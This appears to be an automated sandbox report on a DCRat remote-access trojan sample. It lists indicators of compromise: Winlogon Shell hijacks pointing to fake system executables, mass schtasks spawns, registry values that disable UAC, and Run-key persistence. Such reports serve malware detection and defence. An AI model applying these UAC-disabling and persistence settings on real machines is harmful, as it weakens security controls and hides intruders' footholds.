dcrat | 6d95012691b58c36574d4b1061b07e0a8340909664908e991fad91028777fdd1

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\", \"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\", \"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files\\Uninstall Information\\System.exe\", \"C:\\Windows\\Microsoft.NET\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\", \"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\", \"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\", \"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\dwm.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Users\\All Users\\wininit.exe\", \"C:\\Program Files (x86)\\Windows NT\\TableTextService\\it-IT\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\", \"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\explorer.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\explorer.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\", \"C:\\Program Files\\Windows NT\\TableTextService\\de-DE\\WMIADAP.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files (x86)\\Common Files\\WMIADAP.exe\", \"C:\\MSOCache\\All Users\\csrss.exe\", \"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\", \"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\dwm.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\", \"C:\\Program Files\\Uninstall Information\\System.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1276	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1792	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1328	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	976	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	832	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1708	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1156	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	884	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1312	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1380	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2000	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1628	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	684	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1496	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1976	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	604	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1860	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1512	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1068	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1624	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1508	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	952	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	580	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	276	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2064	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2136	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2164	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2256	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2284	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2300	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2352	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2372	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2400	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2440	328	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2468	328	schtasks.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/memory/2040-54-0x0000000000F50000-0x000000000131A000-memory.dmp	dcrat

Adds Run key to start application 2 TTPs 36 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

0a0a64f3c4fa7d960be983aa0a7d0ce8.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0a0a64f3c4fa7d960be983aa0a7d0ce8 = "\"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Uninstall Information\\System.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\MSOCache\\All Users\\{90140000-0018-0409-0000-0000000FF1CE}-C\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Journal\\Templates\\smss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\wininit.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Recovery\\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\\csrss.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\explorer.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\All Users\\wininit.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\dwm.exe\""	0a0a64f3c4fa7d960be983aa0a7d0ce8.exe
